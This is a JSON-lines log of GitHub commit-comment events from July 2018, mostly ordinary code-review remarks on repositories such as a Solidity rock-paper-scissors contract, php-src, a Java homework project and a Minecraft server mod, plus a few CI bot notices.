{"id":"7975480380","type":"CommitCommentEvent","actor":{"login":"ivowillemsen"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29732092,"position":78,"line":103,"path":"contracts/RockPaperScissors.sol","commit_id":"e3f31208a6332e53a82c47328eae8db989f945c5","created_at":"2018-07-17T09:29:31Z","updated_at":"2018-07-17T09:29:31Z","author_association":"OWNER","body":"lol"}},"created_at":"2018-07-17T09:29:31Z"}
{"id":"7975486470","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"MNKCrypto/RockPaperScissors"},"payload":{"comment":{"id":29732104,"position":84,"line":84,"path":"contracts/RockPaperScissors.sol","commit_id":"60e023e82e3c852b1ee309bcaa47a900a5111241","created_at":"2018-07-17T09:30:38Z","updated_at":"2018-07-17T09:30:38Z","author_association":"NONE","body":"Why not make the function `payable` too so that the player can also top-up via here."}},"created_at":"2018-07-17T09:30:38Z"}
{"id":"7975488052","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"DanGenOn/portfolio-"},"payload":{"comment":{"id":29732107,"position":545,"line":563,"path":"css/main.css","commit_id":"8ae2f669017f363bad36a78362ee723388b9da77","created_at":"2018-07-17T09:30:54Z","updated_at":"2018-07-17T09:30:54Z","author_association":"COLLABORATOR","body":"<div class=\"skills-title\">Мои навыки</div>\r\n<div class=\"skills\"> <!-- Контейнеры с навыками -->\r\n  <div class=\"html\">HTML</div>\r\n  <div class=\"css\">CSS</div>\r\n  <div class=\"java-script\">JavaScript</div>\r\n  <div class=\"bootstrap\">Bootstrap</div>\r\n</div>\r\n\r\n``css\r\n.skills > html {\r\n backgroud: #fefefe;\r\n}\r\n```\r\n\r\n(---- JS -----)(-----HTML-----)\r\n(---- CSS ---)(--Bootstrap--)"}},"created_at":"2018-07-17T09:30:54Z"}
{"id":"7975491798","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"MNKCrypto/RockPaperScissors"},"payload":{"comment":{"id":29732112,"position":83,"line":83,"path":"contracts/RockPaperScissors.sol","commit_id":"60e023e82e3c852b1ee309bcaa47a900a5111241","created_at":"2018-07-17T09:31:36Z","updated_at":"2018-07-17T09:31:36Z","author_association":"NONE","body":"Why not do instead:\r\n\r\n```solidity\r\nif (.player1 == 0) {\r\n    ...\r\n} else if (.player2 == 0) {\r\n    ...\r\n} else {\r\n    revert();\r\n}\r\n```\r\nThat would allow you to remove some earlier `require`s."}},"created_at":"2018-07-17T09:31:36Z"}
{"id":"7975492882","type":"CommitCommentEvent","actor":{"login":"navidshaikh"},"repo":{"name":"mohammedzee1000/container-pipeline-service"},"payload":{"comment":{"id":29732113,"position":6,"line":16,"path":"ci/container_index/run.py","commit_id":"d4353facdc8a29eb75bd599178b2232202557cd0","created_at":"2018-07-17T09:31:47Z","updated_at":"2018-07-17T09:31:47Z","author_association":"COLLABORATOR","body":"you missed a space `./ is default`"}},"created_at":"2018-07-17T09:31:47Z"}
{"id":"7975494344","type":"CommitCommentEvent","actor":{"login":"illyShelly"},"repo":{"name":"franamadis/eatamina_final"},"payload":{"comment":{"id":29732114,"position":19,"line":163,"path":"app/views/products/show.html.erb","commit_id":"4bd43404a2fe8c2be69c71b6f2e238193caf468f","created_at":"2018-07-17T09:32:04Z","updated_at":"2018-07-17T09:32:04Z","author_association":"COLLABORATOR","body":"Practicing comments ;) Too small for our values. 🔢 "}},"created_at":"2018-07-17T09:32:04Z"}
{"id":"7975502469","type":"CommitCommentEvent","actor":{"login":"nikic"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":29732127,"position":14,"line":3976,"path":"ext/standard/array.c","commit_id":"50516a6e1f357f63324ec76e26623f2a7185bd4f","created_at":"2018-07-17T09:33:32Z","updated_at":"2018-07-17T09:33:32Z","author_association":"MEMBER","body":"`Z_ARRVAL_P` would be better here. HASH_OF carries and implication of \"array or object\" which is (thankfully!) not the case here :)"}},"created_at":"2018-07-17T09:33:32Z"}
{"id":"7975504514","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"MNKCrypto/RockPaperScissors"},"payload":{"comment":{"id":29732134,"position":85,"line":85,"path":"contracts/RockPaperScissors.sol","commit_id":"60e023e82e3c852b1ee309bcaa47a900a5111241","created_at":"2018-07-17T09:33:54Z","updated_at":"2018-07-17T09:33:54Z","author_association":"NONE","body":"Why keep a `fundsCollected`? Perhaps it is enough to **know** that the funds collected is equal to `betAmount * count of players`. That would save you 2 expensive `SSTORE`."}},"created_at":"2018-07-17T09:33:54Z"}
{"id":"7975504548","type":"CommitCommentEvent","actor":{"login":"jerriep"},"repo":{"name":"jerriep/airport-explorer-source"},"payload":{"comment":{"id":29732135,"position":null,"line":null,"path":null,"commit_id":"3505ff6ea061390c31f7dad95cc72a46f49df795","created_at":"2018-07-17T09:33:55Z","updated_at":"2018-07-17T09:33:55Z","author_association":"OWNER","body":"I honestly don't know. I have not tried converting to 2.1 yet"}},"created_at":"2018-07-17T09:33:55Z"}
{"id":"7975504888","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29732138,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-17T09:33:59Z","updated_at":"2018-07-17T09:33:59Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-17T09:33:59Z"}
{"id":"7975508487","type":"CommitCommentEvent","actor":{"login":"nikic"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":29732143,"position":11,"line":3973,"path":"ext/standard/array.c","commit_id":"50516a6e1f357f63324ec76e26623f2a7185bd4f","created_at":"2018-07-17T09:34:38Z","updated_at":"2018-07-17T09:34:38Z","author_association":"MEMBER","body":"This should be using `Z_PARAM_ARRAY(stack)`. The way it's written right now, this will cause a copy of the array, which kind of defeats the purpose of having these functions in the first place ^^"}},"created_at":"2018-07-17T09:34:38Z"}
{"id":"7975509624","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"MNKCrypto/RockPaperScissors"},"payload":{"comment":{"id":29732145,"position":86,"line":86,"path":"contracts/RockPaperScissors.sol","commit_id":"60e023e82e3c852b1ee309bcaa47a900a5111241","created_at":"2018-07-17T09:34:50Z","updated_at":"2018-07-17T09:34:50Z","author_association":"NONE","body":"You can use the `SafeMath` library to abstract away some of this."}},"created_at":"2018-07-17T09:34:50Z"}
{"id":"7975510341","type":"CommitCommentEvent","actor":{"login":"AussieGlenn"},"repo":{"name":"AshamaneProject/AshamaneCore"},"payload":{"comment":{"id":29732147,"position":null,"line":null,"path":null,"commit_id":"e447ced9cc2df80965dc484819683774c42a812d","created_at":"2018-07-17T09:34:58Z","updated_at":"2018-07-17T09:34:58Z","author_association":"NONE","body":"Thanks for the cleanup, much appreciated"}},"created_at":"2018-07-17T09:34:58Z"}
{"id":"7975511194","type":"CommitCommentEvent","actor":{"login":"SutoZ"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":29732152,"position":7,"line":13,"path":"Vidly/App_Start/MappingProfile.cs","commit_id":"c79f75ed0acd3be596525ef3bd346b45413ea51f","created_at":"2018-07-17T09:35:07Z","updated_at":"2018-07-17T09:35:07Z","author_association":"NONE","body":"@ZaifSenpai Your comment saved my life! Thank you!"}},"created_at":"2018-07-17T09:35:07Z"}
{"id":"7975512228","type":"CommitCommentEvent","actor":{"login":"finsterwalder"},"repo":{"name":"red6/pdfcompare"},"payload":{"comment":{"id":29732155,"position":null,"line":null,"path":null,"commit_id":"f55b2c83eb35f4d4538942ef9ccf44384e7e9ea7","created_at":"2018-07-17T09:35:18Z","updated_at":"2018-07-17T09:35:18Z","author_association":"MEMBER","body":"You can define an exclude of complete pages, when you do not provide coordinates. So you would have to define an exclude  of page 1 and maybe of pages higher than 2, to get what you want.\r\nThere is an open feature request for inclusions, that might make this easier. But it is possible today."}},"created_at":"2018-07-17T09:35:18Z"}
{"id":"7975513274","type":"CommitCommentEvent","actor":{"login":"nikic"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":29732158,"position":8,"line":3970,"path":"ext/standard/array.c","commit_id":"50516a6e1f357f63324ec76e26623f2a7185bd4f","created_at":"2018-07-17T09:35:30Z","updated_at":"2018-07-17T09:35:30Z","author_association":"MEMBER","body":"`ht` might be better than `stack` here, as these operations are not stack specific. I'm assuming this was copied from something like `array_pop`, which treats an array like a stack."}},"created_at":"2018-07-17T09:35:30Z"}
{"id":"7975513629","type":"CommitCommentEvent","actor":{"login":"joka"},"repo":{"name":"novareto/ukbg.theme"},"payload":{"comment":{"id":29732159,"position":null,"line":null,"path":null,"commit_id":"623dfcacd034d65e93d7116cb2049eb1cd718db5","created_at":"2018-07-17T09:35:34Z","updated_at":"2018-07-17T09:35:34Z","author_association":"NONE","body":"Why are these dependencies pinned? \r\nThis way we cannot update to the current KnownGoodSet Versions for plone 5. \r\nhttp://dist.plone.org/release/5.1.3-pending/versions.cfg"}},"created_at":"2018-07-17T09:35:34Z"}
{"id":"7975518246","type":"CommitCommentEvent","actor":{"login":"flavius"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29732169,"position":12,"line":12,"path":"tests/TicTacToeTest.php","commit_id":"3ffac1b54136046406dd307d484db49ba64d8037","created_at":"2018-07-17T09:36:24Z","updated_at":"2018-07-17T09:36:24Z","author_association":"NONE","body":"The comment. It says \"14 hours ago\". https://github.com/wolfenste/tictactoe/commit/3ffac1b54136046406dd307d484db49ba64d8037#r29725498"}},"created_at":"2018-07-17T09:36:24Z"}
{"id":"7975518370","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"DanGenOn/portfolio-"},"payload":{"comment":{"id":29732170,"position":535,"line":557,"path":"css/main.css","commit_id":"8ae2f669017f363bad36a78362ee723388b9da77","created_at":"2018-07-17T09:36:26Z","updated_at":"2018-07-17T09:36:26Z","author_association":"COLLABORATOR","body":"удалить height"}},"created_at":"2018-07-17T09:36:26Z"}
{"id":"7975522749","type":"CommitCommentEvent","actor":{"login":"techthreads"},"repo":{"name":"ThreadsStyling/tslint"},"payload":{"comment":{"id":29732177,"position":null,"line":null,"path":null,"commit_id":"ba2b96dbb7eefc50f36ef1e992b1fa4112c46e21","created_at":"2018-07-17T09:37:13Z","updated_at":"2018-07-17T09:37:13Z","author_association":"NONE","body":"Build version: __`3.1.0-feat-simplify.12`__ :crossed_fingers: [`feat-simplify`](https://github.com/ThreadsStyling/tslint/tree/feat-simplify) on [*CircleCI*](https://circleci.com/gh/ThreadsStyling/tslint/12) :tada:"}},"created_at":"2018-07-17T09:37:13Z"}
{"id":"7975525266","type":"CommitCommentEvent","actor":{"login":"lukasburda"},"repo":{"name":"lukasburda/test-repo"},"payload":{"comment":{"id":29732183,"position":null,"line":null,"path":null,"commit_id":"f06d09adb6744521edb016d2c587bda351ef5cb4","created_at":"2018-07-17T09:37:41Z","updated_at":"2018-07-17T09:37:41Z","author_association":"OWNER","body":"ajkwdnkjankjda"}},"created_at":"2018-07-17T09:37:41Z"}
{"id":"7975527814","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"DanGenOn/portfolio-"},"payload":{"comment":{"id":29732189,"position":138,"line":88,"path":"index.html","commit_id":"8ae2f669017f363bad36a78362ee723388b9da77","created_at":"2018-07-17T09:38:10Z","updated_at":"2018-07-17T09:38:10Z","author_association":"COLLABORATOR","body":"<section class=\"slider-section\">\r\n <div class=\"slider\"/>\r\n</section>"}},"created_at":"2018-07-17T09:38:10Z"}
{"id":"7975530484","type":"CommitCommentEvent","actor":{"login":"amolbjadhav"},"repo":{"name":"nandkumarj/bellhop"},"payload":{"comment":{"id":29732197,"position":null,"line":null,"path":null,"commit_id":"78b242c8779a338990165545e20249b826290726","created_at":"2018-07-17T09:38:37Z","updated_at":"2018-07-17T09:38:37Z","author_association":"COLLABORATOR","body":"Uploaded the files for following issues from VNF-Onboarding repository\r\n1. MultiVdu Support for TOSCA #7\r\n2. Creating new network with cloudify + Openstack #6\r\n3. Creation of new network for Cloudify + VCD #2\r\n"}},"created_at":"2018-07-17T09:38:37Z"}
{"id":"7975536680","type":"CommitCommentEvent","actor":{"login":"pquerner"},"repo":{"name":"Footrotflat/femanagerextended"},"payload":{"comment":{"id":29732205,"position":null,"line":null,"path":null,"commit_id":"72ae5104140c94deae09e16692ee144776415317","created_at":"2018-07-17T09:39:46Z","updated_at":"2018-07-17T09:39:46Z","author_association":"NONE","body":"Doesnt this have to be \"initializeUpdateAction\" instead of \"initializeCreateAction\" ?"}},"created_at":"2018-07-17T09:39:46Z"}
{"id":"7975538518","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"MNKCrypto/RockPaperScissors"},"payload":{"comment":{"id":29732209,"position":105,"line":105,"path":"contracts/RockPaperScissors.sol","commit_id":"60e023e82e3c852b1ee309bcaa47a900a5111241","created_at":"2018-07-17T09:40:07Z","updated_at":"2018-07-17T09:40:07Z","author_association":"NONE","body":"```solidity\r\nelse if (.player2 == msg.sender) {\r\n    ...\r\n} else {\r\n    revert(\"Invalid Player\");\r\n}\r\n```\r\nThen you can remove your `require` line 99.\r\n"}},"created_at":"2018-07-17T09:40:07Z"}
{"id":"7975538536","type":"CommitCommentEvent","actor":{"login":"Ajaysekard"},"repo":{"name":"Ajaysekard/home"},"payload":{"comment":{"id":29732210,"position":2,"line":1,"path":"README.md","commit_id":"1656c2f928c6ea9bea812dcf775b5865d27f25de","created_at":"2018-07-17T09:40:07Z","updated_at":"2018-07-17T09:40:07Z","author_association":"OWNER","body":"hostel management system\r\n"}},"created_at":"2018-07-17T09:40:07Z"}
{"id":"7975539803","type":"CommitCommentEvent","actor":{"login":"KoltesDigital"},"repo":{"name":"KoltesDigital/shadertoy-exporter"},"payload":{"comment":{"id":29732212,"position":null,"line":null,"path":null,"commit_id":"9d802f9c3235c088d9c1a548c7932c66bda52907","created_at":"2018-07-17T09:40:20Z","updated_at":"2018-07-17T09:40:20Z","author_association":"OWNER","body":"Indeed CORS checks could be disabled, and staying in sync with the API could be painful. Nevertheless I'm interested in importing Shadertoy entries into VEDA, and recording VEDA canvas, independently of this app. When those will be done, this app could only wrap VEDA."}},"created_at":"2018-07-17T09:40:20Z"}
{"id":"7975540391","type":"CommitCommentEvent","actor":{"login":"akien-mga"},"repo":{"name":"godotengine/godot"},"payload":{"comment":{"id":29732213,"position":null,"line":null,"path":null,"commit_id":"c0c243ac5c0a8b03a64fdb18b0e647ae6427279c","created_at":"2018-07-17T09:40:26Z","updated_at":"2018-07-17T09:40:26Z","author_association":"MEMBER","body":"> probably you missed to push \"NewRoot\" icon\r\n\r\nFixed in de910f8c2."}},"created_at":"2018-07-17T09:40:26Z"}
{"id":"7975540749","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"MNKCrypto/RockPaperScissors"},"payload":{"comment":{"id":29732214,"position":109,"line":109,"path":"contracts/RockPaperScissors.sol","commit_id":"60e023e82e3c852b1ee309bcaa47a900a5111241","created_at":"2018-07-17T09:40:30Z","updated_at":"2018-07-17T09:40:30Z","author_association":"NONE","body":"I would mention the bet hash."}},"created_at":"2018-07-17T09:40:30Z"}
{"id":"7975542160","type":"CommitCommentEvent","actor":{"login":"Focusvity"},"repo":{"name":"Telesphoreo/TotalFreedomMod"},"payload":{"comment":{"id":29732220,"position":5,"line":19,"path":"src/main/java/me/totalfreedom/totalfreedommod/fun/Jumppads.java","commit_id":"3e9c0ffab5d1e63594e126c23872b39bbda495e3","created_at":"2018-07-17T09:40:45Z","updated_at":"2018-07-17T09:40:45Z","author_association":"CONTRIBUTOR","body":"Store all of the wools in a list array `List<Material>`"}},"created_at":"2018-07-17T09:40:45Z"}
{"id":"7975543966","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"MNKCrypto/RockPaperScissors"},"payload":{"comment":{"id":29732222,"position":102,"line":102,"path":"contracts/RockPaperScissors.sol","commit_id":"60e023e82e3c852b1ee309bcaa47a900a5111241","created_at":"2018-07-17T09:41:04Z","updated_at":"2018-07-17T09:41:04Z","author_association":"NONE","body":"I would also test that `_betHash != 0`."}},"created_at":"2018-07-17T09:41:04Z"}
{"id":"7975547850","type":"CommitCommentEvent","actor":{"login":"Focusvity"},"repo":{"name":"Telesphoreo/TotalFreedomMod"},"payload":{"comment":{"id":29732228,"position":13,"line":70,"path":"src/main/java/me/totalfreedom/totalfreedommod/fun/Trailer.java","commit_id":"3e9c0ffab5d1e63594e126c23872b39bbda495e3","created_at":"2018-07-17T09:41:45Z","updated_at":"2018-07-17T09:41:45Z","author_association":"CONTRIBUTOR","body":"Same as above but add `Random()` to select different colours. "}},"created_at":"2018-07-17T09:41:45Z"}
{"id":"7975553152","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"MNKCrypto/RockPaperScissors"},"payload":{"comment":{"id":29732239,"position":126,"line":126,"path":"contracts/RockPaperScissors.sol","commit_id":"60e023e82e3c852b1ee309bcaa47a900a5111241","created_at":"2018-07-17T09:42:39Z","updated_at":"2018-07-17T09:42:39Z","author_association":"NONE","body":"Redundant given the below line."}},"created_at":"2018-07-17T09:42:39Z"}
{"id":"7975555402","type":"CommitCommentEvent","actor":{"login":"Focusvity"},"repo":{"name":"Telesphoreo/TotalFreedomMod"},"payload":{"comment":{"id":29732243,"position":2,"line":1,"path":"src/main/java/me/totalfreedom/totalfreedommod/masterbuilder/MasterBuilderWorldRestrictions.java","commit_id":"3e9c0ffab5d1e63594e126c23872b39bbda495e3","created_at":"2018-07-17T09:43:02Z","updated_at":"2018-07-17T09:43:02Z","author_association":"CONTRIBUTOR","body":"Broken in what ways?"}},"created_at":"2018-07-17T09:43:02Z"}
{"id":"7975557324","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"MNKCrypto/RockPaperScissors"},"payload":{"comment":{"id":29732247,"position":131,"line":131,"path":"contracts/RockPaperScissors.sol","commit_id":"60e023e82e3c852b1ee309bcaa47a900a5111241","created_at":"2018-07-17T09:43:22Z","updated_at":"2018-07-17T09:43:22Z","author_association":"NONE","body":"I think it does, but did you confirm that this casting `Outcome(_move)` throws when the number is out of bounds?"}},"created_at":"2018-07-17T09:43:22Z"}
{"id":"7975557542","type":"CommitCommentEvent","actor":{"login":"tsum1k"},"repo":{"name":"minglich/logitech-pubg"},"payload":{"comment":{"id":29732248,"position":null,"line":null,"path":null,"commit_id":"8ed6f4f02965f2e555303811ad28d14b047f52d4","created_at":"2018-07-17T09:43:24Z","updated_at":"2018-07-17T09:43:24Z","author_association":"NONE","body":"@minglich You're a goddamn hero!"}},"created_at":"2018-07-17T09:43:24Z"}
{"id":"7975560308","type":"CommitCommentEvent","actor":{"login":"Focusvity"},"repo":{"name":"Telesphoreo/TotalFreedomMod"},"payload":{"comment":{"id":29732275,"position":4,"line":22,"path":"src/main/java/me/totalfreedom/totalfreedommod/player/FPlayer.java","commit_id":"3e9c0ffab5d1e63594e126c23872b39bbda495e3","created_at":"2018-07-17T09:43:53Z","updated_at":"2018-07-17T09:43:53Z","author_association":"CONTRIBUTOR","body":"You added this import but yet I do not see the need of this import."}},"created_at":"2018-07-17T09:43:53Z"}
{"id":"7975561674","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"MNKCrypto/RockPaperScissors"},"payload":{"comment":{"id":29732277,"position":131,"line":131,"path":"contracts/RockPaperScissors.sol","commit_id":"60e023e82e3c852b1ee309bcaa47a900a5111241","created_at":"2018-07-17T09:44:08Z","updated_at":"2018-07-17T09:44:08Z","author_association":"NONE","body":"Shouldn't you check that the `move > 0`?"}},"created_at":"2018-07-17T09:44:08Z"}
{"id":"7975563269","type":"CommitCommentEvent","actor":{"login":"Focusvity"},"repo":{"name":"Telesphoreo/TotalFreedomMod"},"payload":{"comment":{"id":29732281,"position":4,"line":24,"path":"src/main/java/me/totalfreedom/totalfreedommod/world/AdminWorld.java","commit_id":"3e9c0ffab5d1e63594e126c23872b39bbda495e3","created_at":"2018-07-17T09:44:23Z","updated_at":"2018-07-17T09:44:23Z","author_association":"CONTRIBUTOR","body":"Same as above."}},"created_at":"2018-07-17T09:44:23Z"}
{"id":"7975563838","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"denisk10790/JavaLevel1"},"payload":{"comment":{"id":29732282,"position":1,"line":1,"path":"LessonSecondTaskFirst.java","commit_id":"aecd246ff613b139b192e25d59403d5cf7f90306","created_at":"2018-07-17T09:44:28Z","updated_at":"2018-07-17T09:44:28Z","author_association":"NONE","body":"название пакета с маленькой буквы, нет ни аппер кейса ни кемел кейса"}},"created_at":"2018-07-17T09:44:28Z"}
{"id":"7975565828","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"denisk10790/JavaLevel1"},"payload":{"comment":{"id":29732284,"position":6,"line":6,"path":"LessonSecondTaskFirst.java","commit_id":"aecd246ff613b139b192e25d59403d5cf7f90306","created_at":"2018-07-17T09:44:50Z","updated_at":"2018-07-17T09:44:50Z","author_association":"NONE","body":"делать отступ между названием класса и функцией, а также между функциями"}},"created_at":"2018-07-17T09:44:50Z"}
{"id":"7975565925","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"MNKCrypto/RockPaperScissors"},"payload":{"comment":{"id":29732285,"position":12,"line":12,"path":"contracts/RockPaperScissors.sol","commit_id":"60e023e82e3c852b1ee309bcaa47a900a5111241","created_at":"2018-07-17T09:44:52Z","updated_at":"2018-07-17T09:44:52Z","author_association":"NONE","body":"`Outcome` is not so good a name. It sounds too much like the outcome of the game."}},"created_at":"2018-07-17T09:44:52Z"}
{"id":"7975566586","type":"CommitCommentEvent","actor":{"login":"Focusvity"},"repo":{"name":"Telesphoreo/TotalFreedomMod"},"payload":{"comment":{"id":29732286,"position":4,"line":17,"path":"src/main/java/me/totalfreedom/totalfreedommod/world/Flatlands.java","commit_id":"3e9c0ffab5d1e63594e126c23872b39bbda495e3","created_at":"2018-07-17T09:44:59Z","updated_at":"2018-07-17T09:44:59Z","author_association":"CONTRIBUTOR","body":"Same as above."}},"created_at":"2018-07-17T09:44:59Z"}
{"id":"7975568113","type":"CommitCommentEvent","actor":{"login":"Focusvity"},"repo":{"name":"Telesphoreo/TotalFreedomMod"},"payload":{"comment":{"id":29732291,"position":4,"line":24,"path":"src/main/java/me/totalfreedom/totalfreedommod/world/MasterBuilderWorld.java","commit_id":"3e9c0ffab5d1e63594e126c23872b39bbda495e3","created_at":"2018-07-17T09:45:16Z","updated_at":"2018-07-17T09:45:16Z","author_association":"CONTRIBUTOR","body":"Same as above."}},"created_at":"2018-07-17T09:45:16Z"}
{"id":"7975569379","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"MNKCrypto/RockPaperScissors"},"payload":{"comment":{"id":29732296,"position":131,"line":131,"path":"contracts/RockPaperScissors.sol","commit_id":"60e023e82e3c852b1ee309bcaa47a900a5111241","created_at":"2018-07-17T09:45:30Z","updated_at":"2018-07-17T09:45:30Z","author_association":"NONE","body":"And by that I mean `require`, not the `if` of line 138."}},"created_at":"2018-07-17T09:45:30Z"}
{"id":"7975569926","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"denisk10790/JavaLevel1"},"payload":{"comment":{"id":29732297,"position":88,"line":88,"path":"LessonSecondTaskFirst.java","commit_id":"aecd246ff613b139b192e25d59403d5cf7f90306","created_at":"2018-07-17T09:45:35Z","updated_at":"2018-07-17T09:45:35Z","author_association":"NONE","body":"switch должен иметь конструкцию default  после всех кейсов"}},"created_at":"2018-07-17T09:45:35Z"}
{"id":"7975571647","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"denisk10790/JavaLevel1"},"payload":{"comment":{"id":29732299,"position":91,"line":91,"path":"LessonSecondTaskFirst.java","commit_id":"aecd246ff613b139b192e25d59403d5cf7f90306","created_at":"2018-07-17T09:45:54Z","updated_at":"2018-07-17T09:45:54Z","author_association":"NONE","body":"придерживаться того, чтобы из функции был один выход, те один return"}},"created_at":"2018-07-17T09:45:54Z"}
{"id":"7975574100","type":"CommitCommentEvent","actor":{"login":"Jojo-Schmitz"},"repo":{"name":"musescore/MuseScore"},"payload":{"comment":{"id":29732304,"position":null,"line":null,"path":null,"commit_id":"d9b958dc9e825bd4912aabb38b9efe1b6a0d18c1","created_at":"2018-07-17T09:46:20Z","updated_at":"2018-07-17T09:46:20Z","author_association":"CONTRIBUTOR","body":"Remember to update this again for 2.3.2 ;-)"}},"created_at":"2018-07-17T09:46:20Z"}
{"id":"7975575099","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"denisk10790/JavaLevel1"},"payload":{"comment":{"id":29732305,"position":26,"line":26,"path":"LessonSecondTaskFirst.java","commit_id":"aecd246ff613b139b192e25d59403d5cf7f90306","created_at":"2018-07-17T09:46:31Z","updated_at":"2018-07-17T09:46:31Z","author_association":"NONE","body":"расчет високостного года тоже выносить в отдельную функци, как мы разбирали на занятии"}},"created_at":"2018-07-17T09:46:31Z"}
{"id":"7975575977","type":"CommitCommentEvent","actor":{"login":"Focusvity"},"repo":{"name":"Telesphoreo/TotalFreedomMod"},"payload":{"comment":{"id":29732306,"position":13,"line":33,"path":"src/main/java/me/totalfreedom/totalfreedommod/discord/MessageListener.java","commit_id":"3e9c0ffab5d1e63594e126c23872b39bbda495e3","created_at":"2018-07-17T09:46:41Z","updated_at":"2018-07-17T09:46:41Z","author_association":"CONTRIBUTOR","body":"This line isn't really needed as the name is stored under `VPlayer.java`.\r\n"}},"created_at":"2018-07-17T09:46:41Z"}
{"id":"7975579164","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"denisk10790/JavaLevel1"},"payload":{"comment":{"id":29732310,"position":62,"line":62,"path":"LessonSecondTaskFirst.java","commit_id":"aecd246ff613b139b192e25d59403d5cf7f90306","created_at":"2018-07-17T09:47:17Z","updated_at":"2018-07-17T09:47:17Z","author_association":"NONE","body":"по заданию метод по печати года в консоль нужно было создавать отдельно, а ты все в main запихнул"}},"created_at":"2018-07-17T09:47:17Z"}
{"id":"7975581517","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"MNKCrypto/RockPaperScissors"},"payload":{"comment":{"id":29732314,"position":160,"line":160,"path":"contracts/RockPaperScissors.sol","commit_id":"60e023e82e3c852b1ee309bcaa47a900a5111241","created_at":"2018-07-17T09:47:44Z","updated_at":"2018-07-17T09:47:44Z","author_association":"NONE","body":"You should save the `.fundsCollected` amount in memory instead of doing 2 `SLOAD`."}},"created_at":"2018-07-17T09:47:44Z"}
{"id":"7975581920","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"denisk10790/JavaLevel1"},"payload":{"comment":{"id":29732317,"position":61,"line":61,"path":"LessonSecondTaskFirst.java","commit_id":"aecd246ff613b139b192e25d59403d5cf7f90306","created_at":"2018-07-17T09:47:48Z","updated_at":"2018-07-17T09:47:48Z","author_association":"NONE","body":" зачем 2 раза вызывать isDateValid? не оптимально написано"}},"created_at":"2018-07-17T09:47:48Z"}
{"id":"7975584031","type":"CommitCommentEvent","actor":{"login":"Focusvity"},"repo":{"name":"Telesphoreo/TotalFreedomMod"},"payload":{"comment":{"id":29732322,"position":17,"line":73,"path":"src/main/java/me/totalfreedom/totalfreedommod/freeze/Freezer.java","commit_id":"3e9c0ffab5d1e63594e126c23872b39bbda495e3","created_at":"2018-07-17T09:48:12Z","updated_at":"2018-07-17T09:48:12Z","author_association":"CONTRIBUTOR","body":"It's better to leave it on how you found it. Unless it's causing frozen people to move, you can ignore this comment."}},"created_at":"2018-07-17T09:48:12Z"}
{"id":"7975584464","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"DanGenOn/portfolio-"},"payload":{"comment":{"id":29732323,"position":2,"line":7,"path":"css/main.css","commit_id":"8ae2f669017f363bad36a78362ee723388b9da77","created_at":"2018-07-17T09:48:16Z","updated_at":"2018-07-17T09:48:16Z","author_association":"COLLABORATOR","body":"1. Слайдер перенести в section;\r\n2. У слайдера сделать бордер радиус и в результате там будет покрасивше;\r\n3. Навыки разделить по блокам;\r\n4. Пофиксить комментраии в github."}},"created_at":"2018-07-17T09:48:16Z"}
{"id":"7975585177","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"denisk10790/JavaLevel1"},"payload":{"comment":{"id":29732324,"position":33,"line":33,"path":"LessonSecondTaskSecond.java","commit_id":"aecd246ff613b139b192e25d59403d5cf7f90306","created_at":"2018-07-17T09:48:24Z","updated_at":"2018-07-17T09:48:24Z","author_association":"NONE","body":"форматируем всегда код перед пушем - ctrl + alt + L"}},"created_at":"2018-07-17T09:48:24Z"}
